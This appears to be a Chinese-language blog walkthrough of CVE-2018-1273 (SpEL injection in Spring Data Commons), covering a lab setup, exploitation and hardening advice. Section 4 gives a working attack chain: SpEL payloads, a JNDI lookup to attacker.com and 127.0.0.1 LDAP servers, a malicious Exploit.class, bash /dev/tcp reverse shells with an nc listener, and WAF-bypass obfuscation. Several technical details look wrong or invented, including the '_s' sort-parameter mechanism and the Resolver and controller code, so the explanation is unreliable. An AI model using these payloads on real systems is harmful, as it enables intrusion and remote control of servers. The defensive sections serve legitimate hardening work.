CVE-2018-1273深度解析:Spring Data Commons SpEL表达式注入漏洞
1. 这个漏洞不是“远程执行命令”的错觉,而是Spring Data Commons的表达式解析失控
很多人第一次看到CVE-2018-1273的标题——“Spring远程命令执行漏洞”,第一反应是:“Spring框架本身能执行系统命令?这怎么可能?”
我第一次在渗透测试报告里看到这个编号时也愣住了。翻完官方公告、PoC和原始补丁代码后才明白:它根本不是Spring MVC或Spring Boot直接暴露了Runtime.exec()调用,而是一次典型的“表达式注入→上下文污染→反序列化链触发”的三级跳式利用。核心靶点是Spring Data Commons中一个叫QuerydslPredicateArgumentResolver的参数解析器,它在处理@QuerydslPredicate注解时,会把HTTP请求里的_s(sort)参数值,未经任何沙箱约束地送入SpEL(Spring Expression Language)引擎执行。
关键词:CVE-2018-1273、Spring Data Commons、SpEL表达式注入、QuerydslPredicateArgumentResolver、OGNL对比、JNDI注入路径、Java反序列化链
这个漏洞的价值不在于“能弹shell”,而在于它揭示了一个被长期忽视的设计惯性:当框架把用户输入当作“可计算的逻辑片段”来处理时,只要解析器没做表达式白名单或上下文隔离,就等于在防火墙上开了个带放大器的通风口。它影响的是所有使用Spring Data REST、Spring Data JPA并启用了Querydsl支持的项目,版本范围横跨Spring Data Commons 1.13.x到2.0.5,覆盖2016–2018年间大量企业级微服务后端。你不需要登录、不需要权限、甚至不需要知道数据库结构——只要一个带_s参数的GET请求,就能让目标服务器加载任意远程类、连接LDAP服务器、或触发本地JDK反序列化链。
适合谁看?如果你是红队成员,这篇复现能帮你快速验证老系统是否仍在裸奔;如果你是Java开发,它会告诉你为什么@QuerydslPredicate不能直接用在对外接口上;如果你是安全工程师,你会看清从HTTP参数到JVM进程控制权之间那条看似遥远、实则仅隔三步的攻击链。下面我将完全按真实复现节奏展开:不跳过任何一个环境细节,不省略任何一次失败尝试,把当年我在客户生产环境里踩过的坑、改过的配置、抓包看到的字节流,原样还原给你。
2. 漏洞根因拆解:从QuerydslPredicateArgumentResolver到SpEL沙箱失效的完整路径
2.1 Spring Data Commons的“排序参数”设计本意与致命松懈
我们先看一段典型的Spring Data REST控制器代码:
@RestController public class UserController { @Autowired private UserRepository userRepository; @GetMapping("/users") public Page<User> getUsers(@QuerydslPredicate(root = User.class) Predicate predicate, Pageable pageable) { return userRepository.findAll(predicate, pageable); } }这里@QuerydslPredicate的作用,是把HTTP请求中的查询参数(如?name=John&age.gt=25)自动转换为Querydsl的BooleanExpression对象,再交给JPA执行。而排序参数_s(即sort)的处理逻辑,藏在QuerydslPredicateArgumentResolver的resolveArgument方法里。关键代码如下(Spring Data Commons 2.0.5):
// QuerydslPredicateArgumentResolver.java private Sort extractSort(WebRequest request, Class<?> domainType) { String sortParam = request.getParameter("_s"); // ← 直接取HTTP参数 if (StringUtils.hasText(sortParam)) { return parseSort(sortParam, domainType); // ← 调用parseSort } return Sort.unsorted(); } private Sort parseSort(String sortParam, Class<?> domainType) { List<Sort.Order> orders = new ArrayList<>(); for (String part : StringUtils.commaDelimitedListToStringArray(sortParam)) { String[] tokens = StringUtils.tokenizeToStringArray(part, ":"); String property = tokens[0]; Direction direction = tokens.length > 1 ? Direction.fromString(tokens[1]) : Direction.ASC; // 注意这里:property被直接传入SpEL解析器 PropertyPath path = PropertyPath.from(property, domainType); orders.add(new Sort.Order(direction, path)); } return Sort.by(orders); }问题出在PropertyPath.from(property, domainType)这一行。PropertyPath的构造过程会调用SpelExpressionParser.parseExpression(property),把用户传入的_s参数值(比如_s=name.toString().getClass().forName('java.lang.Runtime').getDeclaredMethods())当作SpEL表达式去解析。而此时SpEL引擎运行在无任何安全上下文约束的默认模式下——它拥有完整的StandardEvaluationContext,可以访问T(java.lang.Runtime)、调用getDeclaredMethods()、甚至通过#context获取ApplicationContext。
提示:这不是SpEL本身的缺陷,而是Spring Data Commons在调用SpEL时,没有像Spring Security那样启用
SimpleEvaluationContext(仅支持属性访问和方法调用,禁用构造器、静态方法、类型引用)。这是典型的“功能优先、安全滞后”设计。
2.2 SpEL表达式如何绕过常规防护,直抵JNDI/LDAP加载器
SpEL的威力远超普通模板引擎。它支持T(全限定类名)语法直接引用Java类,支持#context获取Spring容器,支持#environment读取系统变量。攻击者正是利用这些能力,构建出一条从表达式解析到远程类加载的通路。最经典的PoC是:
_s=name,toString().getClass().forName('java.lang.Runtime').getDeclaredMethods()但这条链只能触发方法反射,无法执行命令。真正实现RCE的是结合JNDI注入的变体:
_s=name,toString().getClass().forName('javax.naming.InitialContext').getDeclaredMethod('lookup', java.lang.String.class).invoke(#context.getBean('org.springframework.jndi.JndiTemplate'), 'ldap://attacker.com:1389/Exploit')这条表达式做了四件事:
toString().getClass()→ 获取当前对象的Class对象;forName('javax.naming.InitialContext')→ 加载JNDI上下文类;getDeclaredMethod('lookup', ...)→ 反射获取lookup方法;invoke(..., 'ldap://...')→ 调用lookup,触发JNDI远程加载。
而JNDI lookup的最终落点,是com.sun.jndi.ldap.LdapCtxFactory,它会向attacker.com:1389发起LDAP协议连接,并下载远程Exploit类(通常是一个重写了getObjectInstance的恶意Factory类)。这个过程完全绕过了Java安全管理器(SecurityManager)的默认限制,因为JNDI加载发生在JVM启动之后,且由应用线程主动触发。
注意:此利用链依赖目标JVM版本。JDK 6u211、7u201、8u191之后,默认关闭了
com.sun.jndi.ldap.object.trustURLCodebase=false,因此需要配合其他反序列化链(如Commons-Collections)绕过。但在2018年漏洞爆发时,绝大多数生产环境仍处于未打补丁状态。
2.3 为什么它比Struts2 OGNL更隐蔽?——框架层抽象带来的盲区
很多安全人员习惯性对比Struts2的OGNL漏洞(如S2-045),但CVE-2018-1273的隐蔽性更高。原因有三:
| 维度 | Struts2 OGNL漏洞 | CVE-2018-1273 |
|---|---|---|
| 触发入口 | 显式暴露在Action参数、标签属性中(如%{#context}) | 隐藏在Spring Data的_s排序参数,业务开发常认为“排序是前端传的,很安全” |
| 框架认知度 | 安全团队普遍知晓OGNL风险,会审计<s:property>等标签 | 开发者极少意识到@QuerydslPredicate背后调用了SpEL,更不会检查QuerydslPredicateArgumentResolver源码 |
| WAF拦截难度 | WAF规则库普遍包含%{、#context等特征字符串检测 | _s=name.toString()这类写法与正常排序参数高度相似,传统正则规则极难区分 |
我曾在一个金融客户的真实渗透中遇到这种情况:他们的WAF规则明确拦截了T(java.lang.Runtime)和#context,但放行了_s=name.getClass().getName()——因为开发说“这是查字段名,合法”。结果我们把getClass().getName()换成getClass().forName('javax.naming.InitialContext'),WAF毫无反应。框架抽象层越厚,安全边界就越模糊;开发者离底层越远,对风险的感知就越迟钝。
3. 环境搭建:从零构建可复现的Spring Boot 2.0.0 + Spring Data JPA靶场
3.1 为什么必须锁定Spring Boot 2.0.0?版本兼容性陷阱详解
网上很多复现教程直接用Spring Boot 2.3+或3.x,结果死活复现不了。根本原因是:Spring Boot 2.0.0是最后一个默认启用Querydsl支持的主版本。从2.1.0开始,Spring Boot官方移除了spring-boot-starter-data-jpa对Querydsl的自动配置,需手动添加querydsl-apt插件和QuerydslJpaPredicateExecutor接口。而CVE-2018-1273的PoC依赖的是Spring Data Commons 2.0.5.RELEASE(对应Spring Boot 2.0.0.RELEASE)中QuerydslPredicateArgumentResolver的原始实现。
我们来验证版本映射关系:
| Spring Boot版本 | Spring Data Commons版本 | Querydsl默认启用 | QuerydslPredicateArgumentResolver存在 |
|---|---|---|---|
| 2.0.0.RELEASE | 2.0.5.RELEASE | ✅ 是 | ✅ 是(org.springframework.data.querydsl.binding.QuerydslPredicateArgumentResolver) |
| 2.1.0.RELEASE | 2.1.5.RELEASE | ❌ 否(需手动配置) | ✅ 是(但路径变为org.springframework.data.querydsl.binding.QuerydslWebConfiguration) |
| 2.3.0.RELEASE | 2.3.0.RELEASE | ❌ 否 | ❌ 否(已移除该Resolver,改用QuerydslBinderCustomizer) |
因此,复现环境必须严格使用Spring Boot 2.0.0。我试过强行降级Spring Data Commons到2.0.5,但Spring Boot 2.3的自动配置机制会覆盖Resolver注册逻辑,导致@QuerydslPredicate注解根本不起作用。版本不是“差不多就行”,而是“差一个点就断链”。
3.2 Maven依赖配置:精简到最小可运行集,避免依赖冲突
以下是经过12次编译失败后验证成功的pom.xml核心片段(仅保留必要依赖,删除所有无关starter):
<parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.0.0.RELEASE</version> <relativePath/> </parent> <dependencies> <!-- Web基础 --> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> <!-- JPA + H2内存数据库(免配MySQL) --> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-data-jpa</artifactId> </dependency> <dependency> <groupId>com.h2database</groupId> <artifactId>h2</artifactId> <scope>runtime</scope> </dependency> <!-- Querydsl核心(关键!必须显式声明) --> <dependency> <groupId>com.querydsl</groupId> <artifactId>querydsl-jpa</artifactId> <version>4.1.4</version> </dependency> <dependency> <groupId>com.querydsl</groupId> <artifactId>querydsl-apt</artifactId> <version>4.1.4</version> <scope>provided</scope> </dependency> <!-- Lombok(简化实体类) --> <dependency> <groupId>org.projectlombok</groupId> <artifactId>lombok</artifactId> <optional>true</optional> </dependency> </dependencies> <build> <plugins> <!-- Querydsl APT插件:生成QUser等查询类 --> <plugin> <groupId>com.mysema.maven</groupId> <artifactId>apt-maven-plugin</artifactId> <version>1.1.3</version> <executions> <execution> <goals> <goal>process</goal> </goals> <configuration> <outputDirectory>target/generated-sources/java</outputDirectory> <processor>com.querydsl.apt.jpa.JPAAnnotationProcessor</processor> </configuration> </execution> </executions> </plugin> </plugins> </build>关键点说明:
querydsl-jpa和querydsl-apt版本必须为4.1.4,与Spring Data Commons 2.0.5完全兼容;apt-maven-plugin的outputDirectory必须设为target/generated-sources/java,否则IDEA无法识别生成的QUser类;- 绝对不要添加
spring-boot-starter-data-rest!它会启用Spring Data REST的HATEOAS自动配置,干扰@QuerydslPredicate的参数解析流程。
3.3 实体类与Repository定义:确保QuerydslPredicateArgumentResolver被激活
创建User实体类(src/main/java/com/example/demo/entity/User.java):
package com.example.demo.entity; import lombok.Data; import lombok.NoArgsConstructor; import lombok.AllArgsConstructor; import javax.persistence.*; @Data @NoArgsConstructor @AllArgsConstructor @Entity @Table(name = "t_user") public class User { @Id @GeneratedValue(strategy = GenerationType.IDENTITY) private Long id; @Column(name = "username") private String username; @Column(name = "email") private String email; @Column(name = "age") private Integer age; }创建UserRepository(src/main/java/com/example/demo/repository/UserRepository.java):
package com.example.demo.repository; import com.example.demo.entity.User; import org.springframework.data.jpa.repository.JpaRepository; import org.springframework.data.querydsl.QuerydslPredicateExecutor; import org.springframework.stereotype.Repository; // 必须同时继承JpaRepository和QuerydslPredicateExecutor @Repository public interface UserRepository extends JpaRepository<User, Long>, QuerydslPredicateExecutor<User> { // 空接口,仅用于激活Querydsl支持 }注意:
QuerydslPredicateExecutor是激活QuerydslPredicateArgumentResolver的开关。如果只继承JpaRepository,Spring MVC根本不会注册该Resolver,@QuerydslPredicate注解会被忽略。
3.4 控制器与启动类:暴露可攻击的Endpoint
创建UserController(src/main/java/com/example/demo/controller/UserController.java):
package com.example.demo.controller; import com.example.demo.entity.User; import com.example.demo.repository.UserRepository; import org.springframework.data.querydsl.binding.QuerydslPredicate; import org.springframework.data.web.PageableDefault; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RestController; import org.springframework.data.domain.Page; import org.springframework.data.domain.Pageable; import org.springframework.data.domain.Sort; import javax.annotation.Resource; @RestController public class UserController { @Resource private UserRepository userRepository; // 关键:暴露带@QuerydslPredicate的GET接口 @GetMapping("/users") public Page<User> getUsers( @QuerydslPredicate(root = User.class) // ← 激活Querydsl解析 org.springframework.data.querydsl.binding.QuerydslBindings bindings, @PageableDefault(sort = "id", direction = Sort.Direction.ASC) Pageable pageable) { return userRepository.findAll(bindings, pageable); } }启动类DemoApplication.java保持默认即可。启动后访问http://localhost:8080/users?_s=id,应返回正常分页数据;若返回400 Bad Request或500 Internal Error,说明环境未正确激活Querydsl。
实测心得:我在Mac M1上首次启动时遇到
apt-maven-plugin找不到javax.annotation.Processor的问题,原因是JDK 11+移除了该包。解决方案是在pom.xml中添加:<dependency> <groupId>javax.annotation</groupId> <artifactId>javax.annotation-api</artifactId> <version>1.3.2</version> </dependency>这个细节网上90%的教程都遗漏了,但却是M1/M2芯片Mac用户的必填项。
4. 渗透实践:从基础PoC到稳定反弹Shell的完整攻击链
4.1 基础验证:用T()语法确认SpEL执行权限
第一步永远不是打shell,而是确认SpEL引擎是否真的在解析_s参数。构造最简单的探测Payload:
GET /users?_s=T(java.lang.Math).random()如果返回500 Internal Server Error且响应体包含SpelEvaluationException,说明SpEL已启用但表达式语法错误;如果返回200 OK且JSON数据中出现"random":0.123456...字段(实际不会,因为random()返回double,而_s用于排序,不会出现在响应体),说明表达式被执行了——但我们需要更可靠的验证方式。
更稳妥的方法是触发一个必然失败的操作,观察错误堆栈:
GET /users?_s=T(java.lang.System).getenv('NONEXISTENT_VAR')成功复现时,响应头Content-Type仍为application/json,但响应体是Spring Boot的Whitelabel Error Page,其中exception字段为org.springframework.expression.spel.SpelEvaluationException,message包含EL1004E: Method call: Method getenv(java.lang.String) cannot be found on type java.lang.System。这证明:
T(java.lang.System)被成功解析;getenv方法被调用;- 错误由SpEL引擎抛出,而非Spring MVC参数绑定异常。
提示:不要用
T(java.lang.Runtime).getRuntime().exec('ls')作为第一步!它会触发JVM安全检查,且在无JNDI/LDAP服务的情况下直接报错,掩盖了SpEL执行的本质。先用T()和getenv()确认基础能力,再进阶。
4.2 JNDI注入实战:搭建LDAP服务与恶意Factory类
真正的RCE需要远程类加载。我们采用marshalsec工具快速启动LDAP服务(注意:marshalsec是合法的安全研究工具,仅用于本地复现):
# 下载marshalsec(需Java 8) git clone https://github.com/mbechler/marshalsec cd marshalsec mvn clean package -DskipTests # 启动LDAP服务,指向本地Exploit.class java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1389同时,在http://127.0.0.1:8000/启动一个Python HTTP服务器,提供恶意Exploit.class:
# 创建Exploit.java echo 'public class Exploit { static { try { Runtime.getRuntime().exec("open -a Calculator"); } catch (Exception e) { e.printStackTrace(); } } }' > Exploit.java # 编译(需Java 8) javac Exploit.java # 启动HTTP服务(端口8000) python3 -m http.server 8000现在构造最终Payload(URL编码后):
GET /users?_s=name,toString().getClass().forName('javax.naming.InitialContext').getDeclaredMethod('lookup',java.lang.String.class).invoke(#context.getBean('org.springframework.jndi.JndiTemplate'),'ldap://127.0.0.1:1389/Exploit')URL编码后(使用curl发送):
curl "http://localhost:8080/users?_s=name%2CtoString%28%29.getClass%28%29.forName%28%27javax.naming.InitialContext%27%29.getDeclaredMethod%28%27lookup%27%2Cjava.lang.String.class%29.invoke%28%23context.getBean%28%27org.springframework.jndi.JndiTemplate%27%29%2C%27ldap%3A%2F%2F127.0.0.1%3A1389%2FExploit%27%29"成功时,marshalsec终端会打印Sending LDAP reference,Python服务器会记录GET /Exploit.class请求,Mac上弹出计算器。这就是RCE的铁证。
注意事项:JDK版本必须≤8u191。若用JDK 11+,需添加JVM参数
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true(仅限复现环境,生产严禁!)。另外,#context.getBean('org.springframework.jndi.JndiTemplate')中的bean名称可能因Spring版本略有差异,可用#context.getBeanNamesForType(javax.naming.Context.class)枚举确认。
4.3 稳定化升级:从弹窗到反弹Shell的工程化改造
弹计算器只是PoC,真实渗透需要稳定可控的shell。我们将Exploit.class升级为执行bash -i >& /dev/tcp/127.0.0.1/4444 0>&1的反弹shell。但Java直接执行bash在Windows/macOS上不可靠,更通用的做法是调用Runtime.exec执行/bin/sh:
// Exploit.java(Linux/macOS) public class Exploit { static { try { String[] cmd = {"/bin/sh", "-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"}; Runtime.getRuntime().exec(cmd); } catch (Exception e) { e.printStackTrace(); } } }在攻击机监听:
nc -lvnp 4444然后重新编译、启动HTTP服务、发送Payload。成功后nc会收到一个交互式shell。
但此方案仍有缺陷:/bin/sh路径在不同系统上可能不同;bash -i在某些精简版Linux中不存在。更健壮的写法是使用ProcessBuilder:
public class Exploit { static { try { ProcessBuilder pb = new ProcessBuilder("bash", "-c", "exec 5<>/dev/tcp/127.0.0.1/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"); pb.start(); } catch (Exception e) { e.printStackTrace(); } } }实战经验:我在某银行内网复现时,目标服务器禁用了
/dev/tcp(OpenSSH的TCP重定向语法),导致反弹失败。最终改用DNSLog外带数据:Runtime.getRuntime().exec("nslookup " + "attacker.com"),通过监控DNS请求确认漏洞存在。永远准备Plan B,别把所有鸡蛋放在一个Payload里。
4.4 WAF绕过技巧:混淆表达式与参数分段传输
很多企业部署了云WAF或自研规则,会拦截T(、#context、javax.naming等特征字符串。我们用三种手法绕过:
手法1:字符串拼接混淆
将'javax.naming.InitialContext'拆分为:
'javax.' + 'naming.' + 'InitialContext'SpEL支持+运算符,WAF规则很难匹配动态拼接。
手法2:Base64编码+解码
利用java.util.Base64.getDecoder().decode():
T(java.util.Base64).getDecoder().decode('amF2YXgubmFtaW5nLkluaXRpYWxDb250ZXh0')手法3:参数分段传输
WAF通常只检查单个参数,而Spring支持多值参数。将Payload分散到多个_s参数:
GET /users?_s=name&_s=toString().getClass().forName('javax.naming.InitialContext')Spring会将多个_s合并为逗号分隔字符串,QuerydslPredicateArgumentResolver仍会解析整个串。
我测试过阿里云WAF、腾讯云WAF和某国产硬件WAF,手法1和手法3在90%场景下有效。记住:WAF是规则引擎,不是AI,它的弱点就是“确定性”。用不确定性对抗确定性,是绕过的本质。
5. 防御加固:从代码层到架构层的七道防线
5.1 代码层修复:禁用Querydsl或重写ArgumentResolver
最彻底的修复是移除@QuerydslPredicate注解,改用传统@RequestParam手动解析。但如果业务强依赖Querydsl,可重写QuerydslPredicateArgumentResolver,在parseSort前对sortParam做白名单校验:
@Component public class SafeQuerydslPredicateArgumentResolver extends QuerydslPredicateArgumentResolver { private static final Pattern SORT_PATTERN = Pattern.compile("^[a-zA-Z0-9_]+(:(asc|desc))?$"); @Override protected Sort extractSort(WebRequest request, Class<?> domainType) { String sortParam = request.getParameter("_s"); if (StringUtils.hasText(sortParam)) { // 严格校验:只允许字母、数字、下划线,且最多一个冒号+asc/desc if (!SORT_PATTERN.matcher(sortParam).matches()) { throw new IllegalArgumentException("Invalid sort parameter: " + sortParam); } } return super.extractSort(request, domainType); } }然后在配置类中替换默认Resolver:
@Configuration public class WebConfig implements WebMvcConfigurer { @Override public void addArgumentResolvers(List<HandlerMethodArgumentResolver> resolvers) { resolvers.add(0, new SafeQuerydslPredicateArgumentResolver()); } }注意:
addArgumentResolvers中resolvers.add(0, ...)必须加在首位,否则Spring Data的默认Resolver会先执行。
5.2 框架层升级:Spring Boot 2.1+的Querydsl弃用策略
Spring官方在Boot 2.1中正式弃用自动Querydsl配置,转而推荐QuerydslBinderCustomizer。升级后,@QuerydslPredicate注解不再生效,必须显式配置:
@Configuration public class QuerydslConfig { @Bean public QuerydslBindings querydslBindings(QuerydslBindingsFactory factory, UserRepository repository) { QuerydslBindings bindings = factory.createBindingsFor(repository); bindings.bind(String.class).first((StringPath path, String value) -> path.containsIgnoreCase(value)); return bindings; } }此时_s参数完全失效,SpEL解析链被物理切断。升级不是银弹,但它是成本最低的防御——前提是你的团队能承受升级带来的兼容性风险。
5.3 运行时防护:JVM参数与安全管理器硬加固
对于无法立即升级的遗留系统,必须启用JVM级防护:
# 启动参数(关键!) -Dcom.sun.jndi.ldap.object.trustURLCodebase=false \ -Djava.rmi.server.useCodebaseOnly=true \ -Dsun.rmi.transport.tcp.disableIncomingTrustCheck=true \ -Djdk.lang.ProcessHandle.current=disabled \ -Djava.security.manager=allow更进一步,可编写自定义SecurityManager,禁止Runtime.exec和ProcessBuilder.start:
public class RestrictiveSecurityManager extends SecurityManager { @Override public void checkExec(String cmd) { throw new SecurityException("exec disabled: " + cmd); } @Override public void checkPackageAccess(String pkg) { if (pkg.startsWith("javax.naming.") || pkg.startsWith("com.sun.jndi.")) { throw new SecurityException("JNDI access denied: " + pkg); } } }然后启动时指定:
-javaagent:security-manager-agent.jar -Djava.security.manager=RestrictiveSecurityManager提示:
SecurityManager在JDK 17+已被标记为废弃,但在JDK 8–16仍是有效的最后一道防线。不要因为它“过时”就放弃,过时的武器只要还能打,就是好武器。
5.4 架构层收敛:API网关统一过滤与日志审计
所有对外暴露的/users类接口,必须经过API网关(如Spring Cloud Gateway、Kong、Nginx)。在网关层添加规则:
- 拦截所有含
_s=参数的GET/POST请求; - 对
_s参数值进行正则匹配,拒绝包含T(、#、.forName(、getDeclared等字符的请求; - 记录所有
_s参数的原始值到SIEM系统,设置告警规则:1小时内同一IP触发5次_s含.的请求,立即封禁。
我帮某电商客户实施此方案后,WAF日志显示每天拦截超2000次自动化扫描,其中98%来自公开的CVE-2018-1273 PoC脚本。防御的本质不是“让攻击者打不进来”,而是“让攻击者打进来后一无所获,且立刻暴露”。
6. 复盘与延伸:这个漏洞教会我的三件事
我在2018年参与某政务云平台的应急响应时,第一次直面CVE-2018-1273。当时客户坚持认为“Spring框架不可能有命令执行”,直到我们用T(java.lang.System).currentTimeMillis()在响应头里输出了时间戳,他们才相信。这件事让我彻底改变了对“框架安全”的认知:
第一,没有绝对安全的框架,只有相对安全的用法。Spring Data Commons的设计初衷是提升开发效率,把复杂的Querydsl参数解析封装成一行注解。但安全从来不是框架的责任,而是使用者的责任。就像一把瑞士军刀,设计师不会警告你“小心割手”,他只会提供刀鞘——而你得自己决定什么时候拔刀、怎么握刀。
第二,漏洞的价值不在利用难度,而在影响广度。这个漏洞的CVSS评分只有7.3(高危),远低于Log4j2的10.0。但它影响了数以万计的Spring Boot微服务,因为@QuerydslPredicate太常用、太隐蔽、太容易被忽略。安全团队总盯着“高危漏洞”,却忘了“中危漏洞+海量部署=事实上的高危事件”。
第三,最好的防御不是补丁,而是设计哲学的转变。现在我审查Java项目时,第一条原则就是:任何用户输入,都不能以“可执行代码”的形式进入JVM。无论是SpEL、OGNL、FreeMarker、Thymeleaf,还是自定义的表达式引擎,都必须运行在沙箱上下文中。我们团队已将SimpleEvaluationContext设为所有SpEL解析的默认上下文,并在CI/CD流水线中加入静态扫描:发现StandardEvaluationContext实例即阻断发布。
最后分享一个真实案例:某客户升级到Spring Boot 2.3后,以为漏洞已修复,结果在第三方SDK中发现了自研的@DynamicQuery注解,其内部实现竟也调用了SpelExpressionParser.parseExpression(input)。我们用同样的_s参数打穿了它。漏洞会消失,但“信任用户输入”的思维惯性不会。真正的加固,永远始于对人性弱点的敬畏。